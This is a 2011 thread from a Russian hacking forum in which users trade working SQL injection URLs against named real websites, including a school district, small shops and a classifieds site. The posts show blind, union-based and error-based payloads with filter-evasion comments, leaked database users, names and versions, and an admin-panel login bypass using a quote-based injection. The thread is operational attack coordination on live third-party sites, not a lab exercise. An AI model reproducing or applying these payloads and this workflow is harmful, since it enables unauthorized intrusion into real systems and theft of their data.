ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.12.2011, 16:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
http://www.oz-gorod.ru/auto_ads.php?aid=3
вот есть скуля, чтобы не подставил суть ошибки не меняется, есть смысл подбирать количество полей?
|
|
|
|
13.12.2011, 16:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от qaz
qaz said:
http://www.oz-gorod.ru/auto_ads.php?aid=3
вот есть скуля, чтобы не подставил суть ошибки не меняется, есть смысл подбирать количество полей?
http://www.oz-gorod.ru/auto_ads.php?aid=-3+unioN+seleCt+1
Ошибка исчезает. Сейчас через ошибку попробую.
--
BigBear, true. Blind =/
|
|
|
|
13.12.2011, 17:01
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от qaz
qaz said:
http://www.oz-gorod.ru/auto_ads.php?aid=3
вот есть скуля, чтобы не подставил суть ошибки не меняется, есть смысл подбирать количество полей?
Это Blind-SQL
Обрати внимание на текст под формой
Код:
Code:
http://www.oz-gorod.ru/auto_ads.php?aid=3+and+substring((@@version),1,1)=5 TRUE
http://www.oz-gorod.ru/auto_ads.php?aid=3+and+substring((@@version),1,1)=4 FASLE
User: us2864h@localhost
Database: db2864h
Version: 5.1.57
|
|
|
13.12.2011, 20:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
183267
Репутация:
84
|
|
Код:
Code:
http://www.kingston.k12.ok.us/index.php?pageID=3675_2%27+and+1=0+/*!UniOn*/+select+1+--+
|
|
|
|
13.12.2011, 20:26
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от shadowrun
shadowrun said:
Код:
Code:
http://www.kingston.k12.ok.us/index.php?pageID=3675_2%27+and+1=0+/*!UniOn*/+select+1+--+
http://www.kingston.k12.ok.us/index.php?pageID=3675_2'+or+1+group+by+concat(vers ion(),floor(rand(0)*2))having+min(0)+or+1--+
http://www.kingston.k12.ok.us/admin/
обход авторизации в админке
login : admin' or '1'='1
pass: pass' or '1'='1
|
|
|
|
13.12.2011, 21:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от BigBear
BigBear said:
Это Blind-SQL
Обрати внимание на текст под формой
Код:
Code:
http://www.oz-gorod.ru/auto_ads.php?aid=3+and+substring((@@version),1,1)=5 TRUE
http://www.oz-gorod.ru/auto_ads.php?aid=3+and+substring((@@version),1,1)=4 FASLE
User: us2864h@localhost
Database: db2864h
Version: 5.1.57а вопрос насчот
and+substring((@@version),1,1)=5 TRUE
че ето за новый вид разкрютки? где я могу почитать мунал?
|
|
|
|
14.12.2011, 04:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
35174
Репутация:
-6
|
|
Код:
Code:
http://www.ozchristmaslightsales.com.au/shopping/pgm-more_information.php?id=-39
Код:
Code:
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317
Cannot get order by.. Any help please? |
|
|
|
14.12.2011, 04:44
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
Сообщение от qaz
qaz said:
а вопрос насчот
and+substring((@@version),1,1)=5 TRUE
че ето за новый вид разкрютки? где я могу почитать мунал?
ничго слошного ф разкрютке нетю особа.
ленк
__________________
|
|
|
|
14.12.2011, 06:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от lightangel
lightangel said:
Код:
Code:
http://www.ozchristmaslightsales.com.au/shopping/pgm-more_information.php?id=-39
Код:
Code:
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317
Cannot get order by.. Any help please?
Код:
Code:
http://www.ozchristmaslightsales.com.au/shopping/pgm-more_information.php?id=-39'+/*!union*/+select+0,1,2,3,4,5,6,version(),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1--+f
user():ozchrist_sope1@localhost
version():5.1.56
database():ozchrist_sope1
Код:
Code:
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=317+group+by+99999999999--+f TRUE
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=317+group+by+1--+f TRUE
I think, this is blind injection...
|
|
|
|
14.12.2011, 10:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
40748
Репутация:
78
|
|
Сообщение от Ereee
Ereee said:
Код:
Code:
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=317+group+by+99999999999--+f TRUE
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=317+group+by+1--+f TRUE
I think, this is blind injection... лол. там не блинд.
Код:
Code:
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317.1111%27+/*!unION*/+select+1,2,3,4,concat_ws%280x3b,database%28%29,user%28%29,version%28%29%29,6,7,8,9,0,11,12,13+--+
При вытаскивании инфы из таблиц, обрамляйте в апострофы имя базы.
Код:
Code:
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317.1111%27+/*!unION*/+select+1,2,3,4,table_name,6,7,8,9,0,11,12,13+fRom+%60information_schema%60.tables+--+
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
